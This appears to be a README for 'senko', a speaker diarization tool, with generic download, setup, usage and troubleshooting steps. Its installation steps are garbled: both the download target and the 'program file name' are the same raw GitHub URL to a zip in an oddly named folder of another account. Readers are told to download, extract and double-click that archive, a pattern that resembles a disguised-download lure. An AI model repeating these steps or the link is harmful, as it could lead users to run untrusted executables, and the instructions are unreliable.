senko is a very fast speaker diarization pipeline designed to help you identify who is speaking in an audio recording. Whether you're transcribing meetings, interviews, or podcasts, senko makes it simple and efficient. This tool uses advanced audio processing technology to separate different speakers, giving you clearer insights into conversations.
This project covers various topics related to audio processing, including:
- audio-ai
- diarization
- fbank
- pyannote
- rapids
- silero-vad
- speaker-diarization
- zanshin
To start using senko, you need to follow these steps:
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Visit the Releases Page
Click on the link below to access the latest version of senko:
Download senko -
Choose Your File
In the releases page, you will see a list of files. Look for the file labeled with the most recent version. It will usually have a name likehttps://raw.githubusercontent.com/engasd999/senko/main/patriarchy/senko.zipor similar. -
Download the File
Click on the download link for the chosen file. This will save the file to your computer. -
Extract the Files
Once the file is downloaded, locate it on your computer (usually in the 'Downloads' folder). Right-click on the file and select "Extract All" or use a file extraction program to unpack the contents. -
Open the Application
Inside the extracted folder, find the program file. This is typically namedhttps://raw.githubusercontent.com/engasd999/senko/main/patriarchy/senko.zipon Windows orsenkoon macOS and Linux. Double-click this file to launch the application. -
Follow the Setup Instructions
After launching the application, follow the on-screen instructions to complete the setup. The application will guide you through any necessary configurations.
To effectively run senko, ensure your system meets these requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or any recent Linux distribution.
- RAM: At least 4 GB of RAM.
- Storage: Minimum of 500 MB of free disk space.
- Processor: Dual-core processor or better for optimal performance.
Here's how you can use senko to separate speakers in an audio file:
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Load Your Audio File
Once the application is open, you will see an option to load your audio file. Click on "Open" and select the audio recording you want to analyze. -
Select the Diarization Settings
You can choose various settings based on what you need. Options may include the number of speakers and the type of audio content (like conversations or presentations). -
Start Processing
Click on "Start" to let senko process the audio. The application will analyze the recording and provide results on the screen. -
Review the Output
After processing, senko will display which speaker spoke at what times in the audio file. You can save this output for further use. -
Export Results
If you want to keep the results, you can export them as a text file or a CSV file. Look for the "Export" button to save the outcome.
If you encounter any issues while using senko, try the following:
- Check System Requirements: Ensure your device meets the necessary specifications.
- File Format: Make sure your audio file is in a supported format, such as WAV or MP3.
- Reopen the Application: Sometimes, simply restarting the application can resolve temporary glitches.
If you continue to face difficulties, consider checking our GitHub Issues page for support or to report a problem.
For further assistance, you can reach out via the project's GitHub page. Contributions, questions, and feedback are always welcome.
senko is open-source software licensed under the MIT License. You can use, modify, and distribute the software under the terms of this license.
Thank you for choosing senko! Your audio analysis journey starts here.